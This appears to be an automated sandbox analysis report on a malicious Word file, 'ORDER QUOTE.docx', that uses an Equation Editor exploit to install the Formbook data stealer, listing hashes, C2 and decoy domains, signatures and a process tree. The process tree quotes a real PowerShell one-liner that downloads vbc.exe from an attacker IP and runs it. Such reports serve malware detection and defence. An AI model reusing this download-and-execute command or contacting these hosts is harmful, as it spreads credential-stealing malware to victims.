Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    22-09-2021 19:13

General

  • Target

    ORDER QUOTE.docx

  • Size

    10KB

  • MD5

    eee70c12ab889fd6173de81fbc9a6817

  • SHA1

    673a841da220e5ba72e5f30d1d566569595ed352

  • SHA256

    7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9

  • SHA512

    7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://198.46.199.161/joo/vbc.exe

Extracted

Family

formbook

Version

4.1

Campaign

m8g0

C2

http://www.psicologarenatacruz.com/m8g0/

Decoy

trypapaya.pro

instructorcornernet.com

techadvisorsfl.com

raunnan.com

filestune.com

learnitanywhereskills.com

beaullife.com

getcovidwear.com

tkrbeautyinstitut.com

lisaphamkhai.com

iconicdds.com

ksoopawlas.com

testosteron.store

jctaketwo.com

awexz.online

onlinening.com

steelwerkschicago.com

lukakordic.com

expertsofcoaching.com

dashcca.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1360
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER QUOTE.docx"
      2⤵
      • Abuses OpenXML format to download file from external location
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1644
      • C:\Windows\SysWOW64\raserver.exe
        "C:\Windows\SysWOW64\raserver.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
          3⤵
            PID:828
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Users\Public\regasm.exe
          "C:\Users\Public\regasm.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:604
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')" & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1228
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))"
              4⤵
              • Blocklisted process makes network request
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1848
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')"
              4⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1700
              • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                  "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1712

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scripting

      1
      T1064

      Exploitation for Client Execution

      1
      T1203

      Defense Evasion

      Scripting

      1
      T1064

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        2f21555f21fae4af9fb7f999103ecac4

        SHA1

        5e092c37f1f0cf1130ec7a8a83ea8d52f3201bbe

        SHA256

        b2dc55608ffdbc2de95d4ca0b31d8039afc9f3ad057b393780357a3aadec6699

        SHA512

        22d46da0eec0a76c588eab9e2ea08cf50f00fcc31c1695fbf5395b75f62740d5953d7c583127057164e2c9acaf72352e7c1bd5465f912a71ac28fdd4fdb44f7f

      • C:\Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • memory/604-61-0x0000000000000000-mapping.dmp
      • memory/828-94-0x0000000000000000-mapping.dmp
      • memory/1228-65-0x0000000000000000-mapping.dmp
      • memory/1360-100-0x000007FE92C10000-0x000007FE92C1A000-memory.dmp
        Filesize

        40KB

      • memory/1360-99-0x000007FEF4CF0000-0x000007FEF4E33000-memory.dmp
        Filesize

        1.3MB

      • memory/1360-98-0x0000000007B10000-0x0000000007BDF000-memory.dmp
        Filesize

        828KB

      • memory/1624-57-0x0000000074B41000-0x0000000074B43000-memory.dmp
        Filesize

        8KB

      • memory/1624-54-0x0000000072251000-0x0000000072254000-memory.dmp
        Filesize

        12KB

      • memory/1624-97-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1624-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1624-55-0x000000006FCD1000-0x000000006FCD3000-memory.dmp
        Filesize

        8KB

      • memory/1644-63-0x0000000000000000-mapping.dmp
      • memory/1644-64-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp
        Filesize

        8KB

      • memory/1684-96-0x0000000001D70000-0x0000000001E04000-memory.dmp
        Filesize

        592KB

      • memory/1684-95-0x0000000001F00000-0x0000000002203000-memory.dmp
        Filesize

        3.0MB

      • memory/1700-80-0x00000000024B0000-0x00000000030FA000-memory.dmp
        Filesize

        12.3MB

      • memory/1700-78-0x00000000024B0000-0x00000000030FA000-memory.dmp
        Filesize

        12.3MB

      • memory/1700-72-0x0000000000000000-mapping.dmp
      • memory/1700-79-0x00000000024B0000-0x00000000030FA000-memory.dmp
        Filesize

        12.3MB

      • memory/1712-91-0x000000000041F1B0-mapping.dmp
      • memory/1712-90-0x0000000000400000-0x000000000042F000-memory.dmp
        Filesize

        188KB

      • memory/1764-83-0x0000000000F00000-0x0000000000F01000-memory.dmp
        Filesize

        4KB

      • memory/1764-85-0x0000000000420000-0x000000000043D000-memory.dmp
        Filesize

        116KB

      • memory/1764-88-0x0000000000DC0000-0x0000000000DF2000-memory.dmp
        Filesize

        200KB

      • memory/1764-81-0x0000000000000000-mapping.dmp
      • memory/1764-87-0x0000000004E60000-0x0000000004EC1000-memory.dmp
        Filesize

        388KB

      • memory/1764-86-0x00000000049E0000-0x00000000049E1000-memory.dmp
        Filesize

        4KB

      • memory/1848-71-0x0000000002102000-0x0000000002104000-memory.dmp
        Filesize

        8KB

      • memory/1848-69-0x0000000002100000-0x0000000002101000-memory.dmp
        Filesize

        4KB

      • memory/1848-70-0x0000000002101000-0x0000000002102000-memory.dmp
        Filesize

        4KB

      • memory/1848-66-0x0000000000000000-mapping.dmp